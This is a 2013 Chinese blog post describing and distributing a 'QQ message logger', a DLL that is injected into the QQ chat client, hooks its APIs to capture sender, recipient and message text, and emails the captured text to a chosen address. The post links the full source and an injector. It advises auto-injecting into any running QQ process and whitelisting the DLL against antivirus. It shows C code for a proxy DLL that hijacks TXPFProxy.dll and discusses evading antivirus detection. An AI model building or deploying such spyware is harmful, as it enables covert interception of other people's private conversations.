posts - 25,  comments - 36,  trackbacks - 0
写一个简单DLL 获取QQ消息的DLL,貌似网上有卖这个,但貌似对于QQ2013是不行的,因为他用动态劫持,貌似最新版用QQ劫持都有点不行。
我测试用远程注入,你可以自己写代码实现远程注入软件也可以网上下载远程注入软件,我为了方便大家把自己写非常远程软件上传到这里,方便你测试。

我先截一下效果图 

这个我只是简单获取 发送方QQ 号 和目标的QQ号 和 文本内容,你如果有其他需求,自己可以添加对应的HOOK的QQ API获取对应信息,也可以上网百度或者google一下。记住发送邮件要用线程不然会阻塞QQ。


代码你可以任意修改,任意发布

我这里只是写了简单的DLL,你可以一个exe 主程序,这个主程序可以后台运行,当发现有QQ进程 ,并且没有注入你的DLL,你就可以注入DLL,这是一个比较可行的办法。
如果杀毒软件拦截,你直接添加信任,下次就不会出现提示框了,QQ对于远程注入会认为合法。
但对于DLL劫持加载DLL 会阻止。

我劫持lpk.dll 和 msimg32 都会拦截,而且金山杀毒只要你复制 这样名字的dll 都会报毒,但你扫描他又认为没有毒,可见杀毒这样的DLL原理还是比较简单,我估计金山是对shell 进行挂钩  。 但貌似如果我用写编译器可以生成这样的文件,杀毒软件是不会报毒,我设想我就用c 语言 fopen  fwrite fread 写一个 exe 应该杀毒软件就不会报毒了,或许这是金山的BUG。(我没有测试我的想法,你感兴趣可以试试)。


我的DLL构成:
MAIL: ZBase64.h ZBase64.cpp  CMail.cpp CMail.h   处理发送简单SMTP邮件
HOOK:ULHook.cpp  ULHook.h 处理HOOK
MAIN: main.cpp 业务层吧。

我发送邮件时用多线程,当你输入字数超过10个我就开始发送了(这里只是为了测试用的),你可以定义100或者更长看你的需求。 

我测试一下劫持 TXPFProxy.dll(进入安全模式把源码TXPFProxy.dll 改为TXPFProxy1.dll ,因为QQ 用驱动保护这个文件不能够被修改删除) 
但貌似QQ会崩溃后面就不加载这个dll. 不知道是不是的假冒的dll 有问题还是怎么了。

我觉得这样写应该没有问题。。。 
 1 #include <Windows.h>
 2 #include <process.h>
 3 
 4 #pragma comment(linker,"/EXPORT:DllCanUnloadNow=TXPFProxy1.DllCanUnloadNow")
 5 #pragma comment(linker,"/EXPORT:DllGetClassObject=TXPFProxy1.DllGetClassObject")
 6 #pragma comment(linker,"/EXPORT:DllRegisterServer=TXPFProxy1.DllRegisterServer")
 7 #pragma comment(linker,"/EXPORT:DllUnregisterServer=TXPFProxy1.DllUnregisterServer")
 8 #pragma comment(linker,"/EXPORT:GetProxyDllInfo=TXPFProxy1.GetProxyDllInfo")
 9 
10 void Init(void*)
11 {
12     Sleep(10000);
13     LoadLibraryA("CULHook.dll");
14 }
15 
16 int __stdcall DllMain(_In_ HANDLE _HDllHandle, _In_ DWORD _Reason, _In_opt_ LPVOID _Reserved)
17 {
18     if(_Reason == DLL_PROCESS_ATTACH)
19     {
20         _beginthread(Init,0,NULL);
21     }
22 
23 }

现在对QQ的DLL劫持 不是那么好做了啊,算了,反正我对这个不感兴趣,只是好玩,基本已经达到我的要求,我又不要卖这个软件。

附件代码:/Files/xvsdf100/QQ消息记录器.zip
posted on 2013-05-10 13:12 小鱼儿 阅读(3871) 评论(1)  编辑 收藏 引用

FeedBack:
# re: QQ消息记录器(获取聊天信息发送到指定邮箱)
2013-05-11 15:05 | ccsdu2009
水平不错 比一般的本科毕业生强!  回复  更多评论
  

只有注册用户登录后才能发表评论。
【推荐】超50万行VC++源码: 大型组态工控、电力仿真CAD与GIS源码库
网站导航: 博客园   IT新闻   BlogJava   知识库   博问   管理


<2013年5月>
2829301234
567891011
12131415161718
19202122232425
2627282930311
2345678

常用链接

留言簿(2)

随笔档案(25)

搜索

  •  

最新评论

阅读排行榜

评论排行榜